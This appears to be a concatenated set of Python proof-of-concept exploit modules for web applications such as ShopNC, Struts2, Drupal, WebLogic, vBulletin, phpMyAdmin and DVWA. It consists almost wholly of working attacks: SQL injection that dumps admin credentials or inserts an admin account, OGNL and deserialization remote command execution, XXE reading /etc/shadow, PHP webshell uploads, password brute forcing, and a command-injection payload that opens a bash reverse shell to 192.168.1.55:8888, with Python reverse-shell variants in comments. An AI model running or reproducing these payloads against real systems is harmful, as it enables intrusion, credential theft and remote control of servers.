def _attack(self): result = {} url = urlparse.urljoin( self.url, '/shop/index.php?act=member_address&op=address') vul_url = urlparse.urljoin( self.url, '/shop/index.php?act=member_address&op=address&inajax=1') payload = "exp&true_name[]=1,1,1,concat(0x7e,(SELECT admin_name FROM shopnc_admin limit 0,1)),concat(0x7e,(SELECT admin_password FROM shopnc_admin limit 0,1)),1,1,1) -- a" values = list() values.append("form_submit=ok&id=&true_name[]=") values.append(payload) values.append( "&city_id=36&area_id=41&area_info=%E5%8C%97%E4%BA%AC%09%E5%8C%97%E4%BA%AC%E5%B8%82%09%E6%9C%9D%E9%98%B3%E5%8C%BA&address=wrwr&tel_phone=rwrwer&mob_phone=12312344123" ) post_data = "".join(values) headers = {"Content-Type": "application/x-www-form-urlencoded"} req.post(vul_url, data=post_data, headers=headers) res = req.get(url) if res.status_code == 200: match_result = re.findall(r'~\w*', res.content, re.I | re.M) if match_result: result['AdminInfo'] = {} result['AdminInfo']['Username'] = match_result[0][1:] result['AdminInfo']['Password'] = match_result[1][1:] return self.parse_attack(result)
def _verify(self): result = {} # 定义地址 vul_url = urlparse.urljoin(self.url, '/index.php?r=me/setBasic') logout_url = urlparse.urljoin(self.url, '/index.php?r=u/logout') login_url = urlparse.urljoin(self.url, '/index.php?r=u/login') admin_url = urlparse.urljoin(self.url, '/index.php?r=admin/setting/site') # 提升管理员权限Payload payload = "UserInfo%5Bname%5D=dubuqingfeng&UserInfo%5Bbio%5D=test&UserInfo%5Bintroduction%5D=&UserInfo%5BIsAdmin%5D=0&yt0=" headers = {"Content-Type": "application/x-www-form-urlencoded"} email = raw_input("Email: ") password = getpass.getpass('password:'******'<a href="/index.php?r=admin">后台管理</a>') if find_result != -1: # 获取cookie cookies = admin_result.cookies # 发送post请求 get_shell_result = req.post(admin_url, cookies=cookies, headers=headers) print cookies print get_shell_result.content print get_shell_result.cookies result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = vul_url result['VerifyInfo']['Postdata'] = payload return self.parse_attack(result)
def _verify(self): result = {} command = "echo 89aifh76ftq4fu38yfq498yf" payload = "Content-Type:%{(#_='multipart/form-data')." payload += "(#[email protected]@DEFAULT_MEMBER_ACCESS)." payload += "(#_memberAccess?" payload += "(#_memberAccess=#dm):" payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." payload += "(#ognlUtil.getExcludedPackageNames().clear())." payload += "(#ognlUtil.getExcludedClasses().clear())." payload += "(#context.setMemberAccess(#dm))))." payload += "(#cmd='%s')." % command payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." payload += "(#p=new java.lang.ProcessBuilder(#cmds))." payload += "(#p.redirectErrorStream(true)).(#process=#p.start())." payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))." payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." payload += "(#ros.flush())}" headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload} response = req.post(self.url, headers=headers) if "89aifh76ftq4fu38yfq498yf" in response.content: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = response.url return self.parse_output(result)
def _verify(self): result = {} #下面以尝试读取/etc/shadow为例子进行测试 filename = '/etc/shadow' payload=r'<?xml version="1.0" encoding="ISO-8859-1"?>'\ '<?xml version="1.0" encoding="ISO-8859-1"?>'\ '<!DOCTYPE foo ['\ '<!ELEMENT foo ANY >'\ '<!ENTITY xxe SYSTEM "file://{file}" >]>' \ '<Request>'\ '<Username>root</Username>'\ '<Password>root</Password>'\ '</Request>'.format(file=filename) expurl = '{url}/api/login'.format(url=self.url) try: response = req.post(expurl, data=payload, headers=self.headers, timeout=50) if re.match('root:.+?:0:0:.+?:.+?:.+?', response.content) and response.status_code == 200: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = expurl result['Fileinfo']['Filename'] = filename result['Fileinfo']['Content'] = response.content else: result = {} except: result = {} return self.parse_output(result)
def _attack(self): result = {} vul_url = '%s/?q=node&destination=node' % self.url uid = int(random.random() * 1000) username = ''.join(random.sample(string.letters + string.digits, 5)) payload = OrderedDict() if not self._verify(verify=False): return self.parse_attack(result) payload['name[0;insert into users(uid, name, pass, status, data) values (%d, \'%s\', ' \ '\'$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld\', 1, \'{b:0;}\');' \ 'insert into users_roles(uid, rid) values (%d, 3);#]' % (uid, username, uid)] \ = 'test' payload['name[0]'] = 'test2' payload['pass'] = '******' payload['form_id'] = 'user_login_block' # print urllib.urlencode(payload) response = req.post(vul_url, data=payload) if response.status_code == 200: result['AdminInfo'] = {} result['AdminInfo']['Username'] = username result['AdminInfo']['Password'] = '******' return self.parse_attack(result)
def _attack(self): if self.check_argv(): result = {} self.headers['Content-Type'] = "multipart/form-data; boundary=----WebKitFormBoundaryMOKvckE0g6qr7jKz" post_data = "------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"files\"; filename=\"testjpg.jpg\"\r\nContent-Type: image/jpeg\r\n\r\n<?php var_dump(md5(123));@assert($_REQUEST['gump']);?>\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\n\r\n \r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"type\"\r\n\r\n\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"picWidth\"\r\n\r\n142\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"picHeight\"\r\n\r\n102\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"waterImg\"\r\n\r\n0\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz--\r\n\r\n" # 上传shell post_url = urlparse.urljoin(self.url,'index.php?ac=common_upfile&type=') resp = req.post(url=post_url,data=post_data) # 从返回的内容中提取上传图片的文件名 if resp.status_code == 200: match_result = re.search(r'value =\'(.*?)\'',resp.content,re.I | re.M) if match_result: # 访问本地文件包含地址 payload = "../../uploadfiles/" + match_result.group(1) + "%00" vul_url = urlparse.urljoin(self.url,"index.php?d=" + payload) resp = req.get(vul_url) if resp.status_code == 200 and '202cb962ac59075b964b07152d234b70' in resp.content: result['ShellInfo'] = {} result['ShellInfo']['URL'] = vul_url result['ShellInfo']['Content'] = "<?php var_dump(md5(123));@assert($_REQUEST['gump']);?>" return self.parse_attack(result) return self._verify()
def _attack(self): result = {} vul_url = '%s/?q=node&destination=node' % self.url uid = int(random.random() * 1000) username = ''.join(random.sample(string.letters + string.digits, 5)) payload = OrderedDict() if not self._verify(verify=False): return self.parse_attack(result) payload['name[0;insert into users(uid, name, pass, status, data) values (%d, \'%s\', ' \ '\'$S$DkIkdKLIvRK0iVHm99X7B/M8QC17E1Tp/kMOd1Ie8V/PgWjtAZld\', 1, \'{b:0;}\');' \ 'insert into users_roles(uid, rid) values (%d, 3);#]' % (uid, username, uid)] \ = 'test' payload['name[0]'] = 'test2' payload['pass'] = '******' payload['form_id'] = 'user_login_block' #print urllib.urlencode(payload) response = req.post(vul_url, data=payload) if response.status_code == 200: result['AdminInfo'] = {} result['AdminInfo']['Username'] = username result['AdminInfo']['Password'] = '******' return self.parse_attack(result)
def common(self): payload = 'formid=1&login=ALARM' response = req.post(self.url + "/escform.esp" , data = payload).content sessionid = re.search('<FRAME src="escmenu\.esp\?sessionid=(\d*)' , response) if sessionid: sessionid = sessionid.group(1) return sessionid
def _verify(self): result = {} username = '******' # 登陆账号 pwdlist = getLargeWeakPassword() for pwd in pwdlist: htmlTXT = req.get(self.url + "/login.php") Content = pq(htmlTXT.text) tokenStr = Content("input") Token = tokenStr[3].value # 获取Token _cookies = htmlTXT.cookies.get_dict() # 获取Cookies payload = {'username': username, 'password': pwd, 'user_token': Token, 'Login': '******'} response = req.post(self.url + "/login.php", data=payload, cookies=_cookies) rcontent = pq(response.text) reqMes = rcontent('.message').text() if reqMes == "Login failed": continue # 失败跳出本次循环 if reqMes == "CSRF token is incorrect": result['extra'] = {} result['extra']['error'] = 'user_token校验失败' return self.parse_output(result) # CSRF 失败 # 成功 result['DBInfo'] = {} result['DBInfo']['Username'] = username result['DBInfo']['Password'] = pwd return self.parse_output(result)
def _verify(self): """verify mode""" result = {} filename = "/_async/AsyncResponseService" self.url = self.url.strip('/') + filename headers = {'content-type': 'text/xml'} # flag = ''.join(random.choices(string.ascii_letters) for _ in xrange(0, 8)) # flag = flag.lower() cmd = 'echo d2hvYW1p|base64 -d|bash' data_linux = self.payload_linux.format(cmd) data_win = self.payload_win.format(cmd) r1 = req.post(self.url, data=data_linux, headers=headers, timeout=7) r2 = req.post(self.url, data=data_win, headers=headers, timeout=7) if r1.status_code == 202 or r2.status_code == 202: result['VerifyInfo'] = {} result['VerifyInfo']['url'] = self.url return self.parse_output(result)
def _verify( self ): result = {} username = '******' # 登陆账号 password = '******' # 登陆密码 htmlTXT = req.get(self.url + "/login.php") Content = pq(htmlTXT.text) tokenStr = Content("input") Token = tokenStr[3].value # 获取Token _cookies = htmlTXT.cookies.get_dict() # 获取Cookies # 改写模式为简单 _cookies['security'] = 'low' payload = {'username': username, 'password': password, 'user_token': Token, 'Login': '******'} response = req.post(self.url + "/login.php", data=payload, cookies=_cookies) # 生成随机md5字符做为验证 rand_num = random.randint(0, 1000) md5 = hashlib.md5() md5.update(str(rand_num)) m = md5.hexdigest() # 验证命令注入是否存在 payload = {'ip': '127.0.0.1;echo "<p>' + str(m) + '</p><br/>"', 'Submit': 'Submit'} response = req.post(self.url + "/vulnerabilities/exec/index.php", data=payload, cookies=_cookies) htmlText = pq(response.text) tag = htmlText('pre p').html() if tag == str(m): # 反射shell 提前开启nc # 方法一 bash Shell payload = {'ip': '127.0.0.1;bash -i >& /dev/tcp/192.168.1.55/8888 0>&1"', 'Submit': 'Submit'} response = req.post(self.url + "/vulnerabilities/exec/index.php", data=payload, cookies=_cookies) # 方法二 new bash Code # payload = {'ip': '127.0.0.1;echo "#\!/bin/bash\n\nbash -i >& /dev/tcp/192.168.1.55/8888 0>&1">shell.sh && ./shell.sh', 'Submit': 'Submit'} # response = req.post(self.url + "/vulnerabilities/exec/index.php", data=payload, cookies=_cookies) # 方法三 Python Shell 貌似这方法只适合手动跑 # payload = { # 'ip' : '127.0.0.1;python -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\'192.168.1.55\',8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([\'/bin/sh\',\'-i\']);"&', # 'Submit': 'Submit'} # response = req.post(self.url + "/vulnerabilities/exec/index.php", data=payload, cookies=_cookies) result['extra'] = {} result['extra']['Shell'] = "OK! Open 'NC -lvv 8888' " return self.parse_output(result)
def _verify(self): """verify mode""" result = {} resp = req.post(self.url) time.sleep(2) if 'information_schema' in resp.content: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url return self.parse_output(result)
def _verify(self): '''verify mode''' result = {} self.headers['Content-type'] = "%{(#nikenb='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#[email protected]@getResponse().getWriter()).(#o.println('bey0nd')).(#o.close())}" resp = req.post(self.url,headers = self.headers) if resp and resp.text and resp.status_code == 200: if "bey0nd" in resp.text: result['FileInfo'] = {} result['FileInfo']['Filename'] = "bey0nd" return self.parse_output(result)
def _verify(self): result = {} url = urlparse.urljoin(self.url, '/shop/index.php?act=member_address&op=address') vul_url = urlparse.urljoin(self.url, '/shop/index.php?act=member_address&op=address&inajax=1') payload = "exp&true_name[]=1,1,1,1,md5(0x2333333),1,1,1) -- a" values = list() values.append("form_submit=ok&id=&true_name[]=") values.append(payload) values.append("&city_id=36&area_id=41&area_info=%E5%8C%97%E4%BA%AC%09%E5%8C%97%E4%BA%AC%E5%B8%82%09%E6%9C%9D%E9%98%B3%E5%8C%BA&address=wrwr&tel_phone=rwrwer&mob_phone=12312344123") post_data = "".join(values) headers = {"Content-Type": "application/x-www-form-urlencoded"} req.post(vul_url, data=post_data, headers=headers) res = req.get(url) if res.status_code == 200 and '525c6bd8bbf951e6863256456f328265' in res.content: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = vul_url result['VerifyInfo']['Payload'] = payload return self.parse_attack(result)
def _attack(self): result = {} vul_url = '/admin/file_manager.php' params = {'action': 'save'} webshell = PhpShell() webshell.set_pwd(genPassword(6)) filename = ''.join( [random.choice(string.ascii_lowercase) for _ in range(6)]) + '.php' content = webshell.get_content() data = {'filename': filename, 'file_contents': content, 'submit': ''} req.post(self.url + vul_url, params=params, data=data) if webshell.check(self.url + ('/%s' % filename)): result['ShellInfo'] = {} result['ShellInfo']['URL'] = self.url + ('/%s' % filename) result['ShellInfo']['Content'] = content return self.parse_output(result)
def _attack(self): head = { 'Connection-Type': 'application/x-www-form-urlencoded', 'Content-Type': 'application/x-www-form-urlencoded' } payload = 'action=get&resource=%3Bid' response = req.post(self.url + '/res.php', data=payload, headers=head) if response.content: return self.parse_attack(response.content) else: return self.parse_attack(False)
def _verify(self): result = {} testurl = urlparse.urljoin(self.url, '/maxImageUpload/original/1.php') vulurl = urlparse.urljoin(self.url, '/maxImageUpload/index.php') payload = { 'myfile': ('1.php', '<?php echo md5(0x2333333);unlink(__FILE__);?>', 'image/jpeg') } data = {'submitBtn': 'Upload'} req.post(vulurl, files=payload, data=data).content resp = req.get(testurl) if '5a8adb32edd60e0cfb459cfb38093755' in resp: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = vulurl result['VerifyInfo']['Payload'] = payload #Write your code here return self.parse_output(result)
def _attack(self): result = {} url = urlparse.urljoin(self.url, '/shop/index.php?act=member_address&op=address') vul_url = urlparse.urljoin(self.url, '/shop/index.php?act=member_address&op=address&inajax=1') payload = "exp&true_name[]=1,1,1,concat(0x7e,(SELECT admin_name FROM shopnc_admin limit 0,1)),concat(0x7e,(SELECT admin_password FROM shopnc_admin limit 0,1)),1,1,1) -- a" values = list() values.append("form_submit=ok&id=&true_name[]=") values.append(payload) values.append("&city_id=36&area_id=41&area_info=%E5%8C%97%E4%BA%AC%09%E5%8C%97%E4%BA%AC%E5%B8%82%09%E6%9C%9D%E9%98%B3%E5%8C%BA&address=wrwr&tel_phone=rwrwer&mob_phone=12312344123") post_data = "".join(values) headers = {"Content-Type": "application/x-www-form-urlencoded"} req.post(vul_url, data=post_data, headers=headers) res = req.get(url) if res.status_code == 200: match_result = re.findall(r'~\w*', res.content, re.I | re.M) if match_result: result['AdminInfo'] = {} result['AdminInfo']['Username'] = match_result[0][1:] result['AdminInfo']['Password'] = match_result[1][1:] return self.parse_attack(result)
def _attack(self): """attack mode""" result = {} filename = "/_async/AsyncResponseService" url = self.url.strip('/') + filename print(url) headers = {'content-type': 'text/xml'} #--ping `whoami`.weblogic.xxxxxx.ceye.io-- cmd_linux = 'echo cGluZyBgd2hvYW1pYC53ZWJsb2dpYy42ZmJwaWMuY2V5ZS5pbw==|base64 -d|bash' cmd_win = 'echo cGluZyBMTEwud2VibG9naWMuNmZicGljLmNleWUuaW8=|base64 -d|bash' data_liunx = self.payload_linux.format(cmd_linux) #print(data_liunx) data_win = self.payload_win.format(cmd_win) r1 = req.post(url, data=data_liunx, headers=headers, timeout=7) r2 = req.post(url, data=data_win, headers=headers, timeout=7) if r1.status_code == 202 or r2.status_code == 202: whoami = self.verify_result() if whoami: result['extra'] = {} result['extra']['whoami'] = whoami result['VerifyInfo'] = {} result['VerifyInfo']['url'] = self.url return self.parse_output(result)
def _verify(self): result = {} url = urlparse.urljoin( self.url, '/shop/index.php?act=member_address&op=address') vul_url = urlparse.urljoin( self.url, '/shop/index.php?act=member_address&op=address&inajax=1') payload = "exp&true_name[]=1,1,1,1,md5(0x2333333),1,1,1) -- a" values = list() values.append("form_submit=ok&id=&true_name[]=") values.append(payload) values.append( "&city_id=36&area_id=41&area_info=%E5%8C%97%E4%BA%AC%09%E5%8C%97%E4%BA%AC%E5%B8%82%09%E6%9C%9D%E9%98%B3%E5%8C%BA&address=wrwr&tel_phone=rwrwer&mob_phone=12312344123" ) post_data = "".join(values) headers = {"Content-Type": "application/x-www-form-urlencoded"} req.post(vul_url, data=post_data, headers=headers) res = req.get(url) if res.status_code == 200 and '525c6bd8bbf951e6863256456f328265' in res.content: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = vul_url result['VerifyInfo']['Payload'] = payload return self.parse_attack(result)
def _verify(self): result = {} vul_url = '/admin/file_manager.php' params = {'action': 'save'} webshell = PhpVerify() filename = ''.join( [random.choice(string.ascii_lowercase) for _ in range(6)]) + '.php' content = webshell.get_content() data = {'filename': filename, 'file_contents': content, 'submit': ''} response = req.post(self.url + vul_url, params=params, data=data) if webshell.check(self.url + ('/%s' % filename)): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = response.url return self.parse_output(result)
def _attack(self): ''' 在根目录下生成一个shell,1.php <?php eval($_POST["a"]);?> ''' result = {} payload = "O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A18%3A%22vB_Database_MySQLi%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A6%3A%22assert%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bs%3A55%3A%22file_put_contents%28%271.php%27%2C%27%3C%3Fphp+eval%28%24_POST%5B%22a%22%5D%29%3B%3F%3E%27%29%22%3B%7D" vulurl = urlparse.urljoin( self.url, "/ajax/api/hook/decodeArguments?arguments=%s" % payload) resp = req.get(vulurl) if resp.status_code == 200: verify_payload = {"a": "echo md5(0x2333);"} shell_url = urlparse.urljoin(self.url, '/1.php') resp1 = req.post(shell_url, data=verify_payload) if resp1.status_code == 200 and "840c3eda3ea42ecd90aeb3434f3510b7" in resp1.content: result['shellURL'] = shell_url + " password: a" return self.parse_attack(result) return self.parse_attack(result)
def _verify(self): result = {} target = self.url + '/celive/live/header.php' post_data = { 'xajax': 'LiveMessage', 'xajaxargs[0][name]': "1',(SELECT 1 FROM (select count(*),concat(" "floor(rand(0)*2),(select md5(233)))a from " "information_schema.tables group by a)b)," "'','','','1','127.0.0.1','2') #" } # 使用 requests 发送 post 请求 response = req.post(target, data=post_data, timeout=10) content = response.content # 这个 e165421110ba03099a1c0393373c5b43 就是 md5(233) 的值 if 'e165421110ba03099a1c0393373c5b43' in content: result = {'VerifyInfo': {}} result['VerifyInfo']['URL'] = target return self.parse_result(result)
def _verify(self, verify=True): result = {} vul_url = '%s/?q=node&destination=node' % self.url payload = { 'name[0 and (select 1 from (select count(*),concat((select md5(715890248' \ '135)),floor(rand(0)*2))x from information_schema.tables group by x' \ ')a);;#]': 'test', 'name[0]': 'test2', 'pass': '******', 'form_id': 'user_login_block', } response = req.post(vul_url, data=payload).content if 'e4f5fd37a92eb41ba575c81bf0d31591' in response: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url result['VerifyInfo']['Payload'] = urllib.urlencode(payload) return self.parse_attack(result)
def _verify(self): """verify mode""" result = {} filename = "/_async/AsyncResponseService" url = self.url.strip('/') + filename print(url) headers = {'content-type': 'text/xml'} flag = "".join(random.choice(string.ascii_letters) for _ in xrange(0, 8)) flag = flag.lower() data = self.payload1.format(flag, flag, flag) print(data) r = req.post(url, data=data, headers=headers, timeout=7) if r.status_code == 202: flag_url = self.url.strip('/') + '/bea_wls_internal/{0}.jsp?pwd=s{1}'.format(flag, flag) print(flag_url) r2 = req.get(flag_url) if flag in r2.content: result['VerifyInfo'] = {} result['VerifyInfo']['url'] = self.url.strip('/') + filename return self.parse_output(result)
def _attack(self): result = {} vulurl = self.url # TODO; if not self.params["var1"]: self.params["var1"] = "a" if not self.params["var2"]: self.params["var1"] = "b" payload = self.params["var1"] + "[0]=1&" + self.params["var2"] + "[0]=2" print payload resp = req.get(vulurl, params=payload) match_result = re.search(self.params['name'] + '{(.*)}', resp.content) if match_result: result['FlagInfo'] = {} result['FlagInfo']['GetFlag'] = self.params[ 'name'] + "{" + match_result.group(1) + "}" resp = req.post(vulurl, params=payload) match_result = re.search(self.params['name'] + '{(.*)}', resp.content) if match_result: result['FlagInfo'] = {} result['FlagInfo']['PostFlag'] = self.params[ 'name'] + "{" + match_result.group(1) + "}" return self.parse_attack(result)
def _verify(self): """verify mode""" result = {} header = { 'Accept': '*/*', 'Accept-Language': 'en', 'User-Agent': 'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)', 'Connection': 'close', 'Content-Type': 'application/x-www-form-urlencoded', } payload = '/index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input' flag = "".join( random.choice(string.ascii_letters) for _ in xrange(0, 8)) data = '<?php echo "' + flag + '"; ?>' self.url = self.url.strip('/') + payload resp = req.post(self.url, headers=header, data=data) time.sleep(2) if flag in resp.content: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url return self.parse_output(result)
def _attack(self): """attack mode""" result = {} filename = "/_async/AsyncResponseService" url = self.url.strip('/') + filename cmd = 'whoami' headers = {'content-type': 'text/xml'} #--ping `whoami`.weblogic.xxxxxx.ceye.io-- flag = "".join(random.choice(string.ascii_letters) for _ in xrange(0, 8)) flag = flag.lower() data = self.payload2.format(flag) r1 = req.post(url, data=data, headers=headers, timeout=7) if r1.status_code == 202: datalist = self.verify_result(flag, cmd) if datalist: result['extra'] = {} result['extra']['whoami'] = datalist[0] result['VerifyInfo'] = {} result['VerifyInfo']['url'] = self.url.strip('/') + filename result['ShellInfo'] = {} result['ShellInfo']['URL'] = datalist[1] result['ShellInfo']['Content'] = data return self.parse_output(result)
def _verify(self): result = {} flag_list = [ 'src="navigation.php', 'frameborder="0" id="frame_content"', 'id="li_server_type">', 'class="disableAjax" title=' ] user_list = ['root', 'admin'] password_list = [ 'root', '123456', '12345678', 'password', 'passwd', '123', 'admin', 'admin123' ] try: response = req.get(self.url) if 'name=\"phpMyAdmin\"' in response.content: target_url = str(self.url) + "/index.php" else: response = req.get(self.url + '/phpmyadmin/index.php') if 'input_password' in response.content and 'name="token"' in response.content: target_url = self.url + "/phpmyadmin/index.php" except Exception as e: pass for user in user_list: for password in password_list: payload_data = "pma_username="******"&pma_password="******"" \ "&server=1&target=index.php&lang=zh_CN&collation_connection=utf8_general_ci" try: respond = req.post(target_url, data=payload_data) for flag in flag_list: if flag in respond.content: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = target_url result['VerifyInfo']['Payload'] = payload_data except Exception as e: # print(e) pass return self.parse_output(result)
def _attack(self): result = {} #need Cookie and username and uid if not 'Cookie' in self.headers: raise Exception('Cookie required') if not 'username' in self.params: raise Exception('uid required') img_url = self.upload_image() payload = '300x300||echo%20PD9waHAgZXZhbCgkX1BPU1RbZV0pOz8%2b|base64%20-d%20%3E%20Uan1wS.php%20%23' sess = req.Session() sess.headers.update(self.headers) sess.get(img_url.replace('300x300', payload)) #get shell resp = req.post('%s/Uan1wS.php' % self.url, data={'e': 'echo strrev(dfgniqsfc);'}).content if 'cfsqingfd' in resp: result['ShellInfo'] = {} result['ShellInfo']['URL'] = '%s/Uan1wS.php' % self.url result['ShellInfo']['Content'] = 'e' return self.parse_attack(result)
def _verify(self): if self.check_argv(): result = {} # 设置header里的Content-Type,表明需要上传文件 self.headers['Content-Type'] = "multipart/form-data; boundary=----WebKitFormBoundaryMOKvckE0g6qr7jKz" # 文件名为testjpg.jpg,内容为<?php echo md5(0x2333333);unlink(__FILE__); ?> post_data = "------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"files\"; filename=\"testjpg.jpg\"\r\nContent-Type: image/jpeg\r\n\r\n<?php echo md5(0x2333333);unlink(__FILE__); ?>\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\n\r\n \r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"type\"\r\n\r\n\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"picWidth\"\r\n\r\n142\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"picHeight\"\r\n\r\n102\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"waterImg\"\r\n\r\n0\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz--\r\n\r\n" # 上传地址,这个是正常功能 post_url = urlparse.urljoin(self.url,'index.php?ac=common_upfile&type=') resp = req.post(url=post_url,data=post_data) # 从返回的内容中提取上传图片的文件名 if resp.status_code == 200: match_result = re.search(r'value =\'(.*?)\'',resp.content,re.I | re.M) if match_result: # 访问本地文件包含地址 payload = "../../uploadfiles/" + match_result.group(1) + "%00" vul_url = urlparse.urljoin(self.url,"index.php?d=" + payload) resp = req.get(vul_url) if resp.status_code == 200 and '5a8adb32edd60e0cfb459cfb38093755' in resp.content: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = vul_url return self.parse_attack(result)